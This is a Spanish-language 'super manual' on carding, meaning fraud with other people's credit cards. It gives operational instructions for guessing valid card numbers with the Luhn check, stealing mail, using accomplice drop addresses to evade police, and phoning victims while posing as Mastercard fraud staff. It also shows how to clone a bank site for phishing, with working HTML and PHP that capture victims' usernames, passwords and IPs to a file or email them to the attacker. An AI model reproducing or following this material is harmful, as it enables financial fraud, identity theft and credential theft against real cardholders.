Súper manual de carding

Contenido

1.-Todo sobre carding

2.-a) Estructura de las Tarjetas de Crédito

3.-b) Tengo el numero que hago?

4.-c)Ingeniería social para conseguir datos de Tarjetas de Crédito

5.-d) Scams y phishing para conseguir datos de Tarjetas de crédito

6.-e)a)Hacer un scam.

1.-Todo sobre Carding

Es el uso ilegitimo de las tarjetas de crédito, o de sus números, pertenecientes a otras

personas. Se relaciona con el hacking, porque para conseguir números de tarjetas de

créditos, una de las formas es utilizando Ingeniería Social y sobre todo nuestra

inteligencia (esto es lo más importante)

Se debe tener mucho cuidado en hacer esto ya que nos podemos meter en muchos líos.

Con nuestras tarjetas de crédito debemos ser cuidadosos ya que alguien puede leer este

documento antes que uno de ustedes y ser capaz de estafarlos.

Se puede recuperar el dinero tal vez pero para eso tendrían que hablar con el

administrador del sitio donde se realizo el pago del artículo solicitando la IP de donde se

hizo la compra y luego de todo esto tenemos que demostrar que nosotros no hicimos la

compra del mismo.

El carding consiste en comprar usando la cuenta bancaria o la tarjeta crédito de otro,

esto se consigue con un poco de ingeniería social y mucha perseverancia.

Cuando alguna persona utiliza carding para comprar objetos materiales se suele utilizar

una dirección falsa con una identificación también falsa, es decir todo el formulario de

compra lo llena con datos falsos.

De esta manera el comprador quedara esperando en el lugar indicado la entrega del

material como si se tratara de su residencia.

La filosofía de los carders se basa en que existe mucha gente que tiene grandes

cantidades de dinero que no cae nada mal utilizar algo de ese dinero para comprar

algunas cositas para cada uno de ellos, ya que posiblemente el dueño de la tarjeta ni se

dé cuenta de esta compra que él no la hizo.

Si ustedes están pensando en comprar por Internet programas o suscripciones y piensan

que utilizando el carding será muy fácil pues tienen toda la razón resulta muy sencillo.

En este manual se conseguirá revisar los métodos que utilizan los carders para hacerse

de los números de tarjetas y burlar las seguridades para poder comprar sin ningún tipo

de problemas.

Tienen que saber que el robo de una tarjeta de crédito es un delito universal por lo que

puede tener causas penales muy graves si no quieres irte de paseo a la cárcel no intenten

nada de esto.

Como hemos dicho antes, después de sacar los datos de la tarjeta de crédito si vamos a

usarlos para comprar por internet se ponen direcciones falsas, las direcciones que se

ponen son las de un dromp.

Un dromp es un compañero del carding, que recibe en su casa los productos que el

carder compra.

Esto se hace para que nadie acabe en la cárcel, por ejemplo, si alguien denuncia que an

comprado por internet con el dinero de su tarjeta, la policía lo primero que investigara

será la dirección a la que se envió el producto. Entonces irán a esa dirección, y hablaran

con el propietario de la casa que ha indicado la dirección.

El no negara todo, y entonces tendrán que comprobar la IP, verán que es diferente, y no

le podrán hacer nada.

En España por lo menos, ni le ponen una multa.

Al que hace todo eso se le llama dromp.

2.-a) Estructura de las Tarjetas de Crédito

Esto es importante ya que sabemos como están formadas las tarjetas de crédito.

Los números de las tarjetas se forman de 16 dígitos divididos en 4 grupos de 4 dígitos

pueden tener valores del 0 al 9 los primeros 4 dígitos sirven para determinar el banco.

Hagamos un ejemplo de la creación de un número de tarjeta:

Numero de tarjeta: 5180 2345 3942 8765

Las posiciones impares son:

5

8

2

4

3

4

8

6

Luego de esto se multiplica los 2 primeros dígitos entre si luego los siguientes y asi

sucesivamente para que sea mas claro quedaría de la siguiente forma:

5*8=40

2*4=8

3*4=12

8*6=48

Si tenemos cifras mayores a 9 se suma los números es decir las cifras reducidas 8+5=13

entonces

1+3=4

En el ejemplo quedaría así:

5*8=40 4+0=4

2*4=8 8

3*4=12 1+2=3

8*6=48 4+8=12 1+2=3

En resumen los números que nos quedan son:

4

8

3

3

Luego de esto suma los números pares que descartamos al principio y súmalos con estos

el resultado debe ser un número múltiplo de 10 para que el número sea correcto:

4+8+3+3+1+0+3+5+9+2+7+5=50

Si no nos diera un número correcto como va a suceder en la mayoría de los casos lo

recomendable es dejar el ultimo casillero libre y jugar con este digito hasta que nos de

un numero valido.

Esta es una de las formas de conseguir un número de tarjeta de crédito es decir

adivinando a ver si nos sale otra puede ser esperar pacientemente el fin de mes el

momento que llega el corte de pago de la tarjeta del vecino nos robamos su

correspondencia y listo ahí tenemos un numerito.

Otra de las formas es creando un portal de Internet donde ponemos artículos a la venta

se explicara esto más adelante.

3.-b) Tengo el numero que hago?

El momento de realizar una compra en línea nos solicitan una serie de datos pero los

mas importantes es decir los que nunca faltan son estos:

Nombre.

Numero de Cuenta.

Fecha de Expiración.

Tipo de tarjeta.

Numero de verificación

Estos datos son muy fáciles de conseguir (a veces)

El nombre es el de la victima sencillo de conseguir, el número de su tarjeta es un poco

más complicado pero hay formas revisando su correspondencia por ejemplo

La fecha de expiración la podremos conseguir haciéndonos pasar por el banco con los

datos que ya conocemos podremos decirle que vamos ampliar su cupo por sus pagos

puntuales o cualquier cosa esto ya queda a su imaginación lo que si nos queda claro es

que conseguir estos datos resulta sumamente sencillo.

Tipo de Tarjeta ya lo sabemos ya revisamos su correspondencia revisar paso uno

Para reconocer el tipo de tarjeta se puede utilizar, el primer digito de la tarjeta que nos

indica el tipo de la misma.

Si el primer número es....

3 ->American Express (15 dígitos)

4 ->VISA (13 o 16 dígitos)

5 ->Mastercard (16 dígitos)

6 ->Discover (16 dígitos)

Con estos datos ya se puede comprar algo en línea generalmente los carders realizan una

compra de algún software pequeño que sea de descarga o una subscripción para ver

pornografía esto lo hacen para probar si la tarjeta funciona o no .

Si el momento de la compra nos solicitaran mas datos ya saben que hacer es mas creo

que al momento de revisar su correo no tendrán estos datos tendrán muchos mas.

4.-c) Ingeniería Social para conseguir datos de Tarjetas de

Crédito

Para conseguir números y datos de una tarjeta de crédito siempre esta la ingeniería

social.

Por ejemplo, tu consigues el numero de teléfono de algún cliente de algún banco, le

llamas y le dices:

"Buenas tardes, soy Antonio Martinez de la sección fraudes de Master Card , hemos

detectado un posible uso fraudulento de su tarjeta, por lo que necesitamos que nos

indique todos los datos de la misma, para realizar una comprobación"

jeje, siempre hay alguien que pica en esto.

Para verificar si la tarjeta es útil se puede hacer una llamada a la entidad bancaria de

donde pertenece la tarjeta nos hacemos pasar como dueños de la tarjeta indicando que

quisimos hacer una compra y nuestra tarjeta fue rechazada para verificar si hablan con

el dueño de la tarjeta pedirán verificar unos datos harán preguntas sencillas como cual

es el numero de tarjeta, numero de verificación esto ya no es problema para nosotros ya

que tenemos toda la información que conseguimos antes al hacernos pasar como

empleados de la entidad que emite la tarjeta.

La información que conseguimos aquí es fundamental ya que podremos saber si la

tarjeta es principal o es un adicional si es de uso nacional o mundial cuanto es el cupo

que tiene la misma, etc.

Las compras que suelen hacer los carders son mediante Internet o telefónicamente no de

montos muy altos para que no se pida confirmación al dueño de la tarjeta y para no

levantar sospechas

El carder es muy cuidadoso no puede andar gritando al mundo sus hazañas porque el es

un ladrón el está robando, si hace un pedido de un articulo no puede pedir otro y otro

artículo a la misma dirección tiene que ir rotando de lugares.

Generalmente si el encargo está en la oficina de correos el ira cuando no haya nadie si

estuviera mucha gente preferirá no arriesgarse y ni siquiera acercarse más al lugar ya

que podría resultar peligroso para él.

Un carder nunca pide algo gigante no se comprara un carro para que le traigan por DHL

ni nada extremadamente caro (un collar de oro de 18 kilates) tampoco algo muy baratito

pero estaría bien que se compre una palm ultimo modelo ese es un buen carder.

El problema que se podría presentar es que el carder cada vez quiere comprar algo mas

y no para se vuelve más adicto por el riesgo y por qué se está comprando buenas cositas

pero no se da cuenta que tal vez lo tiene fichado y próximamente le haga una visita la

policía.

ADVERTENCIA: Recordad lo del dromp

5.-d) Scams y Phishing para conseguir datos de una Tarjeta de

Crédito

También se puede recurrir al Scam y al Phishing para conseguir datos de una tarjeta de

crédito.

El scam es una copia de una web utilizado para sacar contraseñas... y en este caso para

sacar datos de tarjetas de crédito.

El phishing es como la ingeniería social, consiste en enviar un email a la víctima, como

si fueras su típico banco del k el tanto se fía, y engañarle para que se meta en tu scam.

Por ejemplo, yo ago un scam de un banco, donde haya un formulario donde los clientes

metan los datos de sus tarjetas y puedan mover su dinero o hacer lo que quieran. Pues

bien una vez hecho el scam (ya explicare como) me ago pasar por ese banco enviando

un email a la victima diciéndole que por no seque razones tiene que rellenar ese

formulario. Si la víctima se lo cree, se meterá en el scam, y los datos nos los quedamos

nosotros.

6.-d)a)Hacer un scam

Hacer un scam es lo más sencillo que hay en la vida.

Tan solo tienes que ir a la web que quieres scammear y en la barra de herramientas del

explorer (o de mozilla, o de opera xD) klikas en ver/codigo fuente.

Lo pegas en un bloc de notas.

Después de esto haces los siguientes pasos:

la siguiente informacion se la he cojido a Facu.Hack

(http://hackxcrack.es/foro/index.php?topic=6280.0)

1. Miramos el código de la web que queremos clonar.

2. Cambiamos la parte del code del logeo y ponemos algo así:

<form method="GET" action="2.php">

<input type="text" name="user" size="20"><p>

<input type="text" name="pass" size="20"><p>

<input type="submit" value="Enviar" name="send">

</form>

Eso lo que hace es simular un login.

Donde dice "laweb.php" ponemos la web donde vamos a

montar el script .php donde se guardarán las passwords.

SCRIPT PARA GUARDAR UN ARCHIVO DE TEXTO:

<?

$user = strip_tags($_GET['user']);

$pass = strip_tags($_GET['pass']);

$ip = $_SERVER['REMOTE_ADDR'];

$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip." \n";

$open = fopen("logins.txt","a");

fwrite($open,$todo);

fclose($open);

?>

<SCRIPT LANGUAGE="JavaScript">

location.href='www.lawebprincipal.com';

</SCRIPT>

SCRIPT PARA QUE TE LLEGE EMAIL

<?

$tumail = "tumail@gmail.com";

$user = strip_tags($_GET['user']);

$pass = strip_tags($_GET['pass']);

$ip = $_SERVER['REMOTE_ADDR'];

$todo = "User: ".$user." | Pass: ".$pass." | IP: ".$ip."";

mail($tumail,"Victima ".$user." - xD",$todo);

?>

Ahora me explico un poco para los que no lo an entendido.

Para que te lleguen los datos de la victima hay dos maneras.

Hay una, que es en el mismo scam, en un documento de texto.

Vamos que al scam tienes que subir: el login y robados.txt

En robados.txt se quedaran los datos de la víctima.

Y otra cosa que puedes hacer es que los datos de la victima te lleguen a tu email, para

eso copias el script del email y asta listo.

Bueno pos después de terminar tu scam solo tienes que hacer el phishing.

Para eso hazte una cuenta de email tipo esta: nombredelbanco@hotmail.com o algo

parecido, y en el cuerpo del mensaje utiliza la ingeniería inversa.

“y recordar que a la de comprar algo hay k utilizar el dromp.”